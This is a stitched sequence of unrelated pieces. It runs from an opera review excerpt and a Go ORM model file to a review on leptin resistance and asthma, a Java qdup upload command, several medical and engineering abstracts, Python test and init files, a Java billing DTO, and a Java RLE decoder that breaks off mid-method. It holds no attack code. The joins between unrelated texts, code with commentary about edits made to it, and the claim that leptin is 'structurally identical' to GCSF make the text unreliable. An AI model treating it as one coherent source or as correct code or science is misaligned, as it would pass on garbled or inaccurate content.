Ivan Hewett of The Telegraph wrote, “Like all Andriessen’s best pieces, this showed a man constantly engaged, in the most passionate terms, with the unfathomable dichotomies of human life; passion versus rationality, matter versus spirit, life and death.” Andrew Clements of The Guardian rated the Dutch National Opera set four out of five stars and argued, “The tone is wonderfully varied – sometimes profoundly serious, sometimes wildly exuberant or irreverent – matched to a score that is equally diverse and eclectic.” In the Los Angeles Times, Mark Swed lauded it as a “profoundly moving, if slyly unsentimental, meditation on life, love and death [...] it is Andriessen’s “Italian” opera and has the depth, musical richness and (I predict) lasting power of late Verdi.” Swed praised “the humor, the ingratiating jazziness, the terrible fury and, in the end, the ravishing grace of the later scenes.” In a 2019 poll of critics and editors of The Guardian, the opera was ranked the seventh greatest classical composition of the 21st century, with Clements referring to the score as “wonderfully polyglot”.
// worm/model_type.go
package worm

import (
	"reflect"
	"strings"
	"sync"
)

/*
type DB_User struct {
	DB_id   int64 `db:";autoincr"`
	DB_name string
	Age     int       `db:"age"`
	Creatat time.Time `db:"creatat;insert_only"`
}
*/

const (
	STR_AUTOINCR   string = "autoincr"
	STR_NOT_INSERT string = "n_insert"
	STR_NOT_UPDATE string = "n_update"
	STR_NOT_SELECT string = "n_select"
)

type TableName interface {
	TableName() string
}

type FieldInfo struct {
	FieldIndex int
	FieldName  string
	FieldType  reflect.Type
	DbName     string
	AutoIncr   bool
	NotInsert  bool
	NotUpdate  bool
	NotSelect  bool
}

type ModelInfo struct {
	Fields    []FieldInfo
	TableName string
	FieldID   string
}

// Cache of struct (model) information.
var g_model_cache map[reflect.Type]*ModelInfo = make(map[reflect.Type]*ModelInfo)
var g_model_mutex sync.Mutex

func getModelInfoUseCache(v_ent reflect.Value) *ModelInfo {
	g_model_mutex.Lock()
	defer g_model_mutex.Unlock()

	v_ent = reflect.Indirect(v_ent)
	t_ent := v_ent.Type()
	info, ok := g_model_cache[t_ent]
	if ok {
		return info
	}

	info = getModelInfo(v_ent)
	g_model_cache[t_ent] = info
	return info
}

func getModelInfo(v_ent reflect.Value) *ModelInfo {
	minfo := ModelInfo{}
	minfo.TableName = getTableName(v_ent)

	v_ent = reflect.Indirect(v_ent)
	t_ent := v_ent.Type()
	f_num := t_ent.NumField()
	for i := 0; i < f_num; i++ {
		ff := t_ent.Field(i)
		field_name := ff.Name
		db_name := getFieldName(ff)
		if len(db_name) < 1 {
			continue
		}

		finfo := FieldInfo{}
		finfo.FieldIndex = i
		finfo.FieldName = field_name
		finfo.FieldType = ff.Type
		finfo.DbName = db_name
		parseFieldTag(&finfo, ff)
		if strings.ToLower(db_name) == "id" {
			minfo.FieldID = db_name
			finfo.AutoIncr = true
		}
		minfo.Fields = append(minfo.Fields, finfo)
	}

	return &minfo
}

func getTableName(v_ent reflect.Value) string {
	var t_ent = v_ent.Type()
	var tpTableName = reflect.TypeOf((*TableName)(nil)).Elem()
	if t_ent.Implements(tpTableName) {
		return v_ent.Interface().(TableName).TableName()
	}

	if v_ent.Kind() == reflect.Ptr {
		v_ent = v_ent.Elem()
		if v_ent.Type().Implements(tpTableName) {
			return v_ent.Interface().(TableName).TableName()
		}
	} else if v_ent.CanAddr() {
		v1 := v_ent.Addr()
		if v1.Type().Implements(tpTableName) {
			return v1.Interface().(TableName).TableName()
		}
	}

	t_name := t_ent.Name()
	t_name = strings.ToLower(t_name)
	ind := strings.Index(t_name, "db_")
	if ind >= 0 {
		ind += 3
		t_name = t_name[ind:]
	}
	return t_name
}

func getFieldName(ff reflect.StructField) string {
	f_name := ""
	ind := strings.Index(ff.Name, "DB_")
	if ind >= 0 {
		ind += 3
		f_name = ff.Name[ind:]
	}

	tag := ff.Tag.Get("db")
	parts := strings.Split(tag, ";")
	part0 := strings.Trim(parts[0], " ")
	if part0 == "-" {
		f_name = ""
	} else if part0 != "" {
		f_name = part0
	}
	return f_name
}

// parseFieldTag parses the options that follow the field name in a `db` tag.
// (Renamed from parselFeildTag, a typo in the original; the definition and
// its call site were updated together.)
func parseFieldTag(finfo *FieldInfo, ff reflect.StructField) {
	tag := ff.Tag.Get("db")
	if tag == "" {
		return
	}

	parts := strings.Split(tag, ";")
	for i, item := range parts {
		// first part is the field name
		if i == 0 {
			continue
		}
		item = strings.Trim(item, " ")
		if item == STR_AUTOINCR {
			finfo.AutoIncr = true
		} else if item == STR_NOT_INSERT {
			finfo.NotInsert = true
		} else if item == STR_NOT_UPDATE {
			finfo.NotUpdate = true
		} else if item == STR_NOT_SELECT {
			finfo.NotSelect = true
		}
	}
}
Leptin Resistance: A Possible Interface Between Obesity and Pulmonary-Related Disorders

Context: Under normal physiological conditions, leptin regulates body weight by creating a balance between food intake and energy expenditure. In obesity, however, serum leptin levels increase yet fail to maintain energy balance.

Evidence Acquisition: Elevated serum leptin levels are regarded as an established marker of obesity. It is also reported that obese asthmatic patients have the highest serum leptin levels compared to other groups, such as non-obese asthmatics and obese and non-obese subjects without asthma. In addition to its appetite-suppressing effect, leptin also regulates the expression of certain acute-phase proteins, including α-1 antitrypsin (A1AT), in the liver.

Results: A1AT is a protease inhibitor that counterbalances the activity of the neutrophil elastase (NE) enzyme. A1AT reductions in obese, leptin-resistant subjects lead to increased NE activity. The overactivity of NE degrades lung tissue proteins, which may lead to pulmonary disorders including asthma.

Conclusions: On the basis of prior studies, it could be hypothesized that, in obese asthmatic patients, the highest degree of leptin failure/resistance might create an imbalance between NE and its inhibitor A1AT. To ascertain this, large-scale prospective studies are warranted to simultaneously assess comparative serum leptin and A1AT levels and NE activity in non-obese and obese asthmatic patients. Such studies might help to devise novel interventional therapies for the treatment of pulmonary-related problems, including asthma, chronic obstructive pulmonary disorder (COPD), and other lung defects, in susceptible obese subjects in the future.

Context: Obesity is characterized by an excessive accumulation of fat in adipose tissue. A product of the obese (Ob) gene, called leptin, is released primarily from adipocytes and plays a key role in regulating body weight. In most obese subjects, leptin fails to perform its physiological functions in spite of its high serum levels. Obesity is linked with several disorders, including cardiovascular diseases (CVDs), certain types of cancer, and type 2 diabetes, and it raises the risk of pulmonary defects. Recently, Arteaga-Solis et al. demonstrated that leptin resistance leads to increased parasympathetic tone, which in turn causes bronchoconstriction and obesity-associated asthma. Another previous study described a link between hypoventilation and adiposity. Phipps et al. proposed that hyperleptinemia is a cause of respiratory failure in obese, leptin-resistant subjects. It has been suggested that a derangement of leptin expression in adipocytes may affect the lungs and promote asthma. Interestingly, a previous study reported that the highest serum leptin levels occur in asthmatic obese patients compared to the other groups, including non-obese controls, obese subjects, and asthmatic non-obese patients. Serum leptin elevation has already been shown to be an established marker of leptin resistance in severe obesity. This might lead to an imbalance between α-1 antitrypsin (A1AT) and NE activity. A severe deficiency of serum A1AT is important in the development of chronic obstructive pulmonary disorder (COPD) and asthma, which might be due to the degradation of lung tissue elastin by enhanced NE activity.
Briefly, on the basis of the facts described above, it could be postulated that leptin resistance, together with a protease-antiprotease imbalance, may be vital to the predisposition of obese subjects to pulmonary disorders including, among others, asthma and COPD. This review is divided into two parts. The first part highlights body weight regulation and the disruption of leptin's physiological function in obesity. The second part summarizes a possible link between obesity and pulmonary disorders.

Body Weight Regulation by the Leptin Hormone

Leptin was first identified in 1994 in the obese (ob/ob) mouse model. It is a 16 kDa non-glycated protein consisting of 167 amino acids and is primarily expressed in adipose tissues. It is encoded by the obese gene (Ob gene), located on chromosome 7 in humans, and is responsible for regulating the balance between food intake and energy expenditure. During starvation, leptin levels go down, which increases appetite and decreases energy consumption. On the other hand, with sufficient energy stores, leptin inhibits appetite and permits the utilization of energy stores. Leptin regulates energy expenditure and food intake by communicating with the central nervous system (CNS) via its receptor (Ob-Rb) located in the hypothalamus. The hypothalamus is the key site for leptin detection, as it contains two types of neurons: type 1 expresses appetite-suppressing peptides derived from pro-opiomelanocortin (POMC) precursors, whereas type 2 produces appetite-stimulating peptides such as neuropeptide Y (NPY) and agouti-related peptide (AgRP). Leptin suppresses appetite by counteracting NPY and AgRP, while it activates POMC mRNA expression, which enhances the release of a potent appetite-suppressing peptide, alpha-melanocyte stimulating hormone (α-MSH). Mechanisms of leptin action and dysfunction are shown in Figures 1 and 2, respectively.

Obesity and Leptin Dysfunction

Different causes underlie the disruption of leptin's physiological functions. Some studies have shown that obese (Ob/Ob) mice are leptin deficient, and diabetic (db/db) mice have mutated leptin receptors contributing to leptin dysfunction. A rare genetic disorder has been reported in obese humans, which might be due to a mutation in the leptin gene and can be treated with exogenous leptin administration. It has been identified that 12 Pakistani, 5 Turkish, 1 Austrian, and 2 Egyptian obese subjects are leptin deficient because of leptin gene mutations. On the other hand, several previous studies have reported that most obese individuals have elevated serum leptin levels, which are positively correlated with body mass index (BMI). Despite these increased serum leptin levels, leptin fails to retain its appetite-suppressing, weight-reducing effect in obese subjects.

[Figure 1 caption: During normal physiological states, leptin binds with its receptors in the brain and suppresses appetite by counteracting NPY and AgRP, while also inducing POMC mRNA expression. Abbreviations: AgRP, agouti-related peptide; mRNA, messenger ribonucleic acid; NPY, neuropeptide Y; Ob, leptin; Ob-Rb, leptin receptor; POMC, pro-opiomelanocortin.]

Approximately 30-fold higher leptin concentrations were required for weight reduction in obesity. The failure of leptin to function in severely obese subjects may be due to extracellular circulating factors. An interaction between circulating leptin and serum leptin-interacting proteins (SLIPs) contributes to leptin failure.
This leptin appetite-suppressing effect, which is markedly impaired in obese subjects, is shown in Figure 2.

Induction of A1AT Expression by Leptin in Hepatocytes

Leptin is structurally identical to the granulocyte colony-stimulating factor (GCSF). GCSF is a member of the interleukin-6 (IL-6) family, which includes the IL-6 and oncostatin-M (OSM) cytokines. In addition to leptin's control of energy homeostasis through stimulation of its hypothalamic receptor, Janus kinase/signal transducer and activator of transcription (JAK/STAT) signaling is essential in peripheral tissues, especially in the liver. This is vital because it affects the differential expression of the target genes of acute-phase proteins (APPs), including A1AT. Using a wide range of techniques, it has been shown that OSM induces a functional response after 24 hours via STAT3 binding to the STAT sequence. Moreover, different reports using gel shift and luciferase assays have identified that a perfect STAT consensus present in the 3'-A1AT enhancer region was capable of binding the transcription factor STAT3.

[Figure 2 caption: In obesity, leptin cannot bind with its receptors situated in the brain (hypothalamus); adiposity signals arrive due to the stimulation of NPY and AgRP expression with a concomitant decrease of POMC mRNA expression. Leptin failure leads to severe obesity, which is associated with various disorders including insulin resistance, T2D, CVD, hypertension, and asthma. Abbreviations: AgRP, agouti-related peptide; CVD, cardiovascular disease; NPY, neuropeptide Y; Ob, leptin; Ob-Rb, leptin receptor; POMC, pro-opiomelanocortin; T2D, type 2 diabetes.]

For other cell types such as monocytes and macrophages, lipopolysaccharides (LPS) up-regulate the A1AT gene, which is also stimulated in lung epithelial tissues in response to OSM. In HepG2 cells, A1AT gene regulation occurs at the transcriptional stage and is mediated primarily via hepatocyte promoters containing the STAT3 sequence. A1AT levels were stimulated up to threefold by the two cytokines IL-6 and OSM in HepG2 cell lines. It was suggested that the short and long leptin receptor isoforms are expressed in HepG2 hepatic cells, which supports the hypothesis that, like the OSM cytokine, leptin might act to regulate a few gene targets in hepatocytes. Recently, Jiang's laboratory demonstrated that the expression of the A1AT gene was leptin-dependent in mouse models and that leptin stimulation increases A1AT levels both at the mRNA and protein levels via the JAK/STAT3 pathway in cultured hepatic Hep1-6 cell lines. A specific tyrosine residue, Tyr1138, in the intracellular domain of the leptin receptor (Ob-Rb) mediates the activation of STAT3. The binding of the leptin ligand causes Ob-Rb to undergo homo-oligomerization and subsequently bind to JAK2. Only Ob-Rb possesses the STAT-binding site. In vivo studies have demonstrated that STAT3 is the major transcriptional factor in this signaling. Binding of Ob-Rb with JAK2 leads to JAK2 autophosphorylation and the phosphorylation of Tyr985, Tyr1077, and Tyr1138 on the Ob-Rb receptor. The phosphorylation of Tyr1138 recruits STAT3 proteins to the Ob-Rb-JAK2 complex. Tyrosine-phosphorylated STAT3 molecules can dimerize and translocate into the nucleus to activate the transcription of target genes in peripheral tissues such as vascular endothelial cells and HepG2 liver cells. The induction of A1AT expression by leptin is illustrated in Figure 3.
[Figure 3 caption: Leptin binds with its receptors on hepatocytes; successively, STAT3 molecules dimerize, translocate into the nucleus, and bind with the promoter region of the serpin gene in order to up-regulate acute-phase protein expression, including A1AT. Abbreviations: A1AT, alpha-1-antitrypsin; JAK-STAT3, Janus kinase-signal transducer and activator of transcription.]

Results

In obesity, disruption of leptin-mediated signaling occurs, which may lead to lung function failure alongside concomitant increases in body weight. Olson et al. suggested that leptin stimulates lung ventilation, whereas leptin deficiencies lead to hypoventilation in obese subjects. The relationship between obesity and asthma is complex and involves several mechanisms. A few recent studies have indicated that the highest leptin levels occur in the sera of asthmatic obese patients relative to the other groups, such as asthmatic non-obese patients, normal obese subjects, and non-obese subjects without asthma or other pulmonary complications. Canoz et al. report 14.5%, 40%, and 76% increases in serum leptin in asthmatic obese patients compared to obese subjects without asthma and non-obese subjects with and without asthma, respectively. Wahab and colleagues have indicated significant increases in serum leptin levels in obese asthmatic patients (25.8 ± 11.1 ng/mL) compared with non-obese asthmatic patients (8.8 ± 11.1 ng/mL). Another study has shown that the maximum serum leptin levels in obese asthmatic patients (19.37 ± 14.04 ng/mL) are elevated compared with non-obese asthmatic patients (6.37 ± 2.46 ng/mL) and healthy controls (6.50 ± 3.51 ng/mL). Mahmoud et al. demonstrated maximum serum leptin levels in COPD cases, both in exacerbation and in stable condition, relative to the other groups. Their calculations indicated that, compared to the non-obese control subjects, there were 90.34%, 68.75%, and 64% increases in serum leptin levels in obese subjects with COPD, obese subjects without COPD, and non-obese subjects with COPD, respectively. Therefore, these previous investigations clearly indicate that leptin resistance is linked to respiratory/pulmonary-related complications and may contribute to the development of a unique asthma phenotype in obese patients. An elegant study reported that leptin stimulates A1AT expression at both the mRNA and protein levels via the JAK2-STAT3 pathway in HepG2 and Hep1-6 liver cell lines. Conversely, serum levels of A1AT are reduced in obese, leptin-resistant subjects, with parallel increases in neutrophil elastase (NE) activity. Elevated serum NE levels are also related to airway constriction in obese subjects. In the same obese subjects, increases in C-reactive protein (CRP) have also been reported, which induce leptin resistance via CRP-leptin adduct formation. An imbalance of A1AT and NE leads to lung tissue impairment. Leptin's actions on the brain and hepatocytes are summarized in Figure 4.

Hypothesis and Outlook for Further Research

In short, previously published data raise the possibility that the protease-antiprotease balance is leptin dependent and that, under leptin resistance, the protective capacity of A1AT to counteract NE activity could be arrested. Consequently, degradation of lung tissues, especially elastin, occurs through NE overactivity, which could lead to pulmonary-related problems in the susceptible obese population. This hypothesis is summarized as: leptin resistance in asthmatic obese patients may reduce serum alpha-1 antitrypsin levels.
In turn, NE activity increases, which can lead to the development of pulmonary-related complications, including asthma and COPD, through the degradation of proteins in lung tissues. Exploring the mechanisms underlying the derangement of the protease-antiprotease counterparts will aid in devising personalized interventional therapy for the particular obese patients prone to lung complications. This option is preferable to generalizing treatment across all patients suffering from respiratory complications, including non-obese subjects.
package io.hyperfoil.tools.qdup.cmd.impl;

import io.hyperfoil.tools.qdup.cmd.Cmd;
import io.hyperfoil.tools.qdup.cmd.Context;

public class Upload extends Cmd {

    private String path;
    private String destination;
    String populatedPath;
    String populatedDestination;

    public Upload(String path, String destination) {
        this.path = path;
        this.destination = destination;
    }

    public Upload(String path) {
        this(path, "");
    }

    public String getPath() { return path; }
    public String getDestination() { return destination; }

    @Override
    public void run(String input, Context context) {
        // Resolve any state variable references in the path and destination.
        populatedPath = populateStateVariables(path, this, context);
        populatedDestination = populateStateVariables(destination, this, context);
        // Create the remote directory if the destination looks like a directory.
        if (populatedDestination.endsWith("/")) {
            context.getSession().sh("mkdir -p " + populatedDestination);
        }
        context.getLocal().upload(
            populatedPath,
            populatedDestination,
            context.getSession().getHost()
        );
        context.next(path);
    }

    @Override
    public Cmd copy() {
        return new Upload(this.path, this.destination);
    }

    @Override
    public String toString() { return "upload: " + path + " " + destination; }

    @Override
    public String getLogOutput(String output, Context context) {
        // Prefer the populated (variable-resolved) values once run() has executed.
        String usePath = populatedPath != null ? populatedPath : path;
        String useDestination = populatedDestination != null ? populatedDestination : destination;
        return "upload: " + usePath + " " + useDestination;
    }
}
Congenital Abnormalities: Consequence of Maternal Zika Virus Infection: A Narrative Review. BACKGROUND Zika virus (ZIKV) is a deadly flavivirus that has spread from Africa to Asian and European countries. The virus is related to other viruses in the same genus or family, transmitted by the same mosquito species, with a known history of fatality. A sudden increase in the rate of ZIKV infection has made it a global health concern, which necessitates close symptom monitoring, enhanced treatment options, and vaccine production. OBJECTIVES This paper reviewed current reports on birth defects associated with ZIKV, the mode of transmission, body fluids containing the virus, diagnosis, possible preventive measures or treatments, and vaccine development. METHODS Google Scholar was used as the major search engine for research and review articles, up to July 2016. Search terms such as "ZIKV", "ZIKV infection", "ZIKV serotypes", "treatment of ZIKV infection", "co-infection with zika virus", "flavivirus", "microcephaly and zika", "birth defects and Zika", as well as "ZIKV vaccine" were used. RESULTS ZIKV has been detected in several body fluids such as saliva, semen, blood, and amniotic fluid. This reveals the possibility of sexual and mother-to-child transmission. The ability of the virus to cross the placental barrier and the blood-brain barrier (BBB) has been associated with birth defects such as microcephaly, ocular defects, and Guillain-Barré syndrome (GBS). Preventive measures can reduce the spread and risk of the infection. Available treatments only target symptoms, while vaccines are still under development. CONCLUSION Birth defects are associated with ZIKV infection in pregnant women; hence the need for the development of standard treatments, the employment of strict preventive measures, and the development of effective vaccines.
Changes in psychological well-being in female patients with clinically diagnosed depression: an exploratory approach in a therapeutic setting The objective of this exploratory one-group pretest-posttest study was to evaluate the nature of psychological change in depressed psychiatric inpatients attending a multi-disciplinary treatment programme, including physical activity, designed to improve mental well-being. Female depressed psychiatric patients (n=51) were examined before and after this programme over a period of 3 months. The following psychological parameters were assessed: depression, anxiety, global self-esteem, and physical self-perceptions. Depressed patients demonstrated statistically significant improvements in depression, anxiety, global self-esteem and physical self-worth (t ranging from −3.76 to 4.65, all p<0.007; ES ranging from 0.53 to −0.65). Changes in depression and anxiety displayed a strong negative correlation with changes in global self-esteem, and those changes were independent of the initial severity of the depressive symptoms (F ranging from 0.03 to 0.70, n.s.). Patients with greater improvement in physical self-perceptions reported greater improvement in anxiety symptoms than patients who did not improve. Consequently, within the limitations of the research design, it can be concluded that the programme appeared successful in improving psychological well-being in female depressed patients. The results also provide preliminary insight into the potential role of the physical self in recovery.
"""Utility to load compute graphs from diffrent sources.""" import os def load_compute_graph(name): path = os.environ.get('VISION_BONNET_MODELS_PATH', '/opt/aiy/models') with open(os.path.join(path, name), 'rb') as f: return f.read()
# Package initializer for CarDetection_python_codes.
# Note: Python module names cannot contain hyphens, so the hyphenated imports in the
# original file could never load; the source files are assumed here to use underscores
# (extract_features.py, train_classifier.py) to make the package importable.
from .extract_features import *
from .train_classifier import *
from .test_classifier import *
from .nms import *
from .config import *
Research on an Immersive Interior Decoration Experience and Interactive System Based on Virtual Reality With the widespread application of virtual reality, the home improvement industry has gradually adopted this technology to promote house interior decoration. Virtual reality can help consumers experience an immersive room design in advance and avoid wasting money. In this paper, we present an immersive interior decoration system built on the HTC Vive headset to meet the demands of various consumers. A menu layout and three attractive room styles are designed for an excellent visual experience. Furthermore, an interaction scheme for the handle controllers is created to support effective human-computer interaction. In the end, user feedback demonstrates that our system is user-friendly both visually and in its interaction.
# Copyright (C) 2020-2021, <NAME>.
# This program is licensed under the Apache License version 2.
# See LICENSE or go to <https://www.apache.org/licenses/LICENSE-2.0.txt> for full license details.

import pytest
import torch

from torchcam.cams import core


def test_cam_constructor(mock_img_model):
    model = mock_img_model.eval()
    # Check that wrong target_layer raises an error
    with pytest.raises(ValueError):
        _ = core._CAM(model, '3')


def test_cam_precheck(mock_img_model, mock_img_tensor):
    model = mock_img_model.eval()
    extractor = core._CAM(model, '0.3')
    with torch.no_grad():
        # Check missing forward raises Error
        with pytest.raises(AssertionError):
            extractor(0)

        # Check that a batch of 2 cannot be accepted
        _ = model(torch.cat((mock_img_tensor, mock_img_tensor)))
        with pytest.raises(ValueError):
            extractor(0)

        # Correct forward
        _ = model(mock_img_tensor)

        # Check incorrect class index
        with pytest.raises(ValueError):
            extractor(-1)

        # Check missing score
        if extractor._score_used:
            with pytest.raises(ValueError):
                extractor(0)


@pytest.mark.parametrize(
    "input_shape, spatial_dims",
    [
        [(8, 8), None],
        [(8, 8, 8), None],
        [(8, 8, 8), 2],
        [(8, 8, 8, 8), None],
        [(8, 8, 8, 8), 3],
    ],
)
def test_cam_normalize(input_shape, spatial_dims):
    input_tensor = torch.rand(input_shape)
    normalized_tensor = core._CAM._normalize(input_tensor, spatial_dims)
    # Shape check
    assert normalized_tensor.shape == input_shape
    # Value check
    assert not torch.any(torch.isnan(normalized_tensor))
    assert torch.all(normalized_tensor <= 1) and torch.all(normalized_tensor >= 0)


def test_cam_clear_hooks(mock_img_model):
    model = mock_img_model.eval()
    extractor = core._CAM(model, '0.3')

    # Check that there is only one hook on the model
    assert len(extractor.hook_handles) == 1
    assert extractor.hook_a is None
    with torch.no_grad():
        _ = model(torch.rand((1, 3, 32, 32)))
    assert extractor.hook_a is not None

    # Remove it
    extractor.clear_hooks()
    assert len(extractor.hook_handles) == 0

    # Check that there is no hook anymore
    extractor.hook_a = None
    with torch.no_grad():
        _ = model(torch.rand((1, 3, 32, 32)))
    assert extractor.hook_a is None


def test_cam_repr(mock_img_model):
    model = mock_img_model.eval()
    extractor = core._CAM(model, '0.3')

    assert repr(extractor) == "_CAM(target_layer='0.3')"
The incremental contribution of clinical breast examination to invasive cancer detection in a mammography screening program. OBJECTIVE The objective of this study was to determine the potential added contribution of clinical breast examination (CBE) to invasive breast cancer detection in a mammography screening program, by categories of age and breast density. SUBJECTS AND METHODS We prospectively followed 61,688 women aged 40 years or older, who had undergone at least one screening examination with mammography and CBE between January 1, 1996, and December 31, 2000, for 1 year after their mammogram for invasive cancer. We computed the incremental sensitivity, specificity, and positive predictive value of CBE over mammography alone for combinations of age and breast density (predominantly fatty or dense). RESULTS Mammography sensitivity was 78% and combined mammography-CBE sensitivity was 82%; thus, CBE detected an additional 4% of invasive cancers. CBE detected a minority of invasive cancers compared with mammography for all age groups and all breast densities. Sensitivity increased when CBE was added to screening mammography for all ages, with gains ranging from 6.8% in women ages 50-59 years with dense breasts to 1.8% in women ages 60-69 years with fatty breasts. CBE generally added incrementally more to sensitivity among women with dense breasts. Specificity and positive predictive value declined when CBE was used in conjunction with mammography, and this decrement was more pronounced in women with dense breasts. CONCLUSION CBE had a modest incremental benefit to invasive cancer detection over mammography alone in a screening program, but also led to a greater risk of false-positive results. These risks and benefits were greater in women with dense breasts. The balance of risks and benefits must be weighed carefully when evaluating the inclusion of CBE in a screening examination.
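To make the incremental-screening arithmetic described above concrete, here is a minimal Python sketch. The 2x2 counts below are hypothetical (chosen only so that the sensitivities come out near the reported 78% and 82%), and the function name is our own; the study's actual data are not reproduced here.

import math

def screening_stats(tp, fn, fp, tn):
    """Return (sensitivity, specificity, PPV) from 2x2 screening counts."""
    sensitivity = tp / (tp + fn)
    specificity = tn / (tn + fp)
    ppv = tp / (tp + fp)
    return sensitivity, specificity, ppv

# Hypothetical counts: mammography alone vs. mammography combined with CBE.
mammo = screening_stats(tp=78, fn=22, fp=500, tn=9400)
combined = screening_stats(tp=82, fn=18, fp=650, tn=9250)

# Incremental sensitivity of combined screening over mammography alone,
# and the accompanying drop in specificity.
print(f"incremental sensitivity: {combined[0] - mammo[0]:+.1%}")
print(f"change in specificity:   {combined[1] - mammo[1]:+.1%}")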
Anharmonic Effects in Single-Walled Carbon Nanotubes Analyzed through Low-Temperature Raman Imaging The high thermal conductivity of single-walled carbon nanotubes (SWCNTs) has gained much attention for applications in potential thermal devices. Here, we investigate anharmonic effects, originating from phonon interactions, of SWCNT bundles by temperature-dependent Raman imaging using our home-built mini cryostat system. The cryostat system is small enough to be mounted on a piezo scanner that suppresses thermal drift, enabling Raman imaging at different temperatures. We obtained Raman spectral images of several SWCNT bundles with a spatial resolution of a few hundred nanometers at different temperatures. We found that different bundles show different temperature dependences of Raman peak intensity, shift, and width. The temperature dependence was further elucidated by considering the sample topography observed by atomic force microscopy, where bundle effects seem to play an important role in influencing the anharmonicity. Temperature-dependent Raman analysis based on spatially resolved imaging will be a powerful tool to investigate anharmonic effects of advanced carbon nanomaterials as well as to realize in situ visualization of thermal properties for future thermal devices.
package com.ycsoft.business.dto.core.prod;

import com.ycsoft.beans.core.prod.CProd;

public class CProdDto extends CProd {

    private static final long serialVersionUID = -2590105154516096344L;

    private String is_invalid_tariff;
    private String is_zero_tariff;      // whether this is a zero-fee tariff
    private String allow_pay;           // whether renewal payment is allowed
    private String tariff_name;         // product tariff name
    private String next_tariff_name;    // next product tariff name
    private String package_name;
    private Integer tariff_rent;
    private String billing_type;
    private Integer billing_cycle;
    private Integer owe_fee;            // accumulated arrears
    private Integer real_bill;          // arrears for the current month
    private Integer all_balance;        // balance: active_balance + order_balance
    private String stb_id;
    private String card_id;
    private String modem_mac;
    private String has_dyn;             // whether dynamic resources exist ('T', 'F')
    private String is_pause = "F";      // whether the product can be paused (not pausable by default)
    private Integer inactive_balance;
    private String month_rent_cal_type;
    private Integer real_balance;
    private Integer active_balance;
    private Integer real_fee;
    private String p_bank_pay;

    public String getMonth_rent_cal_type() { return month_rent_cal_type; }
    public void setMonth_rent_cal_type(String month_rent_cal_type) { this.month_rent_cal_type = month_rent_cal_type; }
    public String getTariff_name() { return tariff_name; }
    public void setTariff_name(String tariff_name) { this.tariff_name = tariff_name; }
    public String getStb_id() { return stb_id; }
    public void setStb_id(String stbId) { stb_id = stbId; }
    public String getCard_id() { return card_id; }
    public void setCard_id(String cardId) { card_id = cardId; }
    public String getModem_mac() { return modem_mac; }
    public void setModem_mac(String modemMac) { modem_mac = modemMac; }
    public Integer getBilling_cycle() { return billing_cycle; }
    public void setBilling_cycle(Integer billingCycle) { billing_cycle = billingCycle; }
    public String getNext_tariff_name() { return next_tariff_name; }
    public void setNext_tariff_name(String next_tariff_name) { this.next_tariff_name = next_tariff_name; }
    public String getIs_zero_tariff() { return is_zero_tariff; }
    public void setIs_zero_tariff(String is_zero_tariff) { this.is_zero_tariff = is_zero_tariff; }
    public String getAllow_pay() { return allow_pay; }
    public void setAllow_pay(String allow_pay) { this.allow_pay = allow_pay; }
    public String getPackage_name() { return package_name; }
    public void setPackage_name(String package_name) { this.package_name = package_name; }
    public Integer getTariff_rent() { return tariff_rent; }
    public void setTariff_rent(Integer tariff_rent) { this.tariff_rent = tariff_rent; }
    public String getBilling_type() { return billing_type; }
    public void setBilling_type(String billingType) { billing_type = billingType; }
    public String getIs_invalid_tariff() { return is_invalid_tariff; }
    public void setIs_invalid_tariff(String is_invalid_tariff) { this.is_invalid_tariff = is_invalid_tariff; }
    public Integer getOwe_fee() { return owe_fee; }
    public void setOwe_fee(Integer owe_fee) { this.owe_fee = owe_fee; }
    public Integer getAll_balance() { return all_balance; }
    public void setAll_balance(Integer all_balance) { this.all_balance = all_balance; }
    public Integer getReal_bill() { return real_bill; }
    public void setReal_bill(Integer real_bill) { this.real_bill = real_bill; }
    public String getHas_dyn() { return has_dyn; }
    public void setHas_dyn(String has_dyn) { this.has_dyn = has_dyn; }
    public String getIs_pause() { return is_pause; }
    public void setIs_pause(String is_pause) { this.is_pause = is_pause; }
    public Integer getInactive_balance() { return inactive_balance; }
    public void setInactive_balance(Integer inactive_balance) { this.inactive_balance = inactive_balance; }
    public Integer getReal_balance() { return real_balance; }
    public void setReal_balance(Integer real_balance) { this.real_balance = real_balance; }
    public Integer getActive_balance() { return active_balance; }
    public void setActive_balance(Integer active_balance) { this.active_balance = active_balance; }
    public Integer getReal_fee() { return real_fee; }
    public void setReal_fee(Integer real_fee) { this.real_fee = real_fee; }
    public String getP_bank_pay() { return p_bank_pay; }
    public void setP_bank_pay(String p_bank_pay) { this.p_bank_pay = p_bank_pay; }
}
Effect of Plant Growth Promoting Microorganisms on Pepper Plants Infected with Tomato Brown Rugose Fruit Virus Symbiotic interaction between plants and microorganisms in the rhizosphere is an important factor affecting plant growth and fitness. Arbuscular mycorrhizal fungi symbiosis increases the resistance of plants to stress factors, including pathogens. Tomato brown rugose fruit virus (ToBRFV) is an important destructive virus damaging tomatoes and peppers, with losses that can reach 100%. It appears on the current list of quarantine organisms in the Czech Republic. The aim of this study was to evaluate the influence of root colonization with Funneliformis mosseae and/or Azospirillum brasilense on ToBRFV symptoms and viral titre reduction. Plants treated with arbuscular mycorrhizal fungi (AMF) had lower symptom emergence after 14 dpi; however, there was no difference in symptom emergence after 21 dpi across all treatments. The highest colonization intensity by Funneliformis mosseae was detected in ToBRFV-negative plants treated with both AMF and Azospirillum (AZO), and the lowest in ToBRFV-positive plants with the same treatment (AMF + AZO). The colonization intensity of Azospirillum brasilense in all treated variants ranged from 20% to 41%. The results suggest that the combination of these two beneficial microorganisms in ToBRFV-infected plants negatively affected AMF colonization.
//Program to decode RLE data
public class Main {
    public static void main(String[] args) {
        //the data that has to be decoded: (count, value) pairs
        byte data[] = {3, 15, 6, 4};
        //decode the data by calling decodeRLE()
        byte decoded[] = decodeRLE(data);
        //print the decoded data
        for (int i = 0; i < decoded.length; i++) {
            System.out.println(decoded[i]);
        }
    }

    //method decodeRLE: expands (count, value) pairs into the original bytes
    public static byte[] decodeRLE(byte[] rleData) {
        //size of the data that has to be decoded
        int n = rleData.length;
        //array to store the numbers which represent the repeating data
        byte repeats[] = new byte[n / 2];
        //array to store the numbers that have to be repeated
        byte data2[] = new byte[n / 2];
        //size of the new decoded array
        int size = 0;
        int j = 0;
        //find the repeats at the even positions
        for (int i = 0; i < n; i += 2) {
            repeats[j] = rleData[i];
            size += repeats[j];
            j++;
        }
        j = 0;
        //find the numbers that have to be repeated at the odd positions
        for (int i = 1; i < n; i += 2) {
            data2[j] = rleData[i];
            j++;
        }
        //create new array to store the decoded data
        byte decode[] = new byte[size];
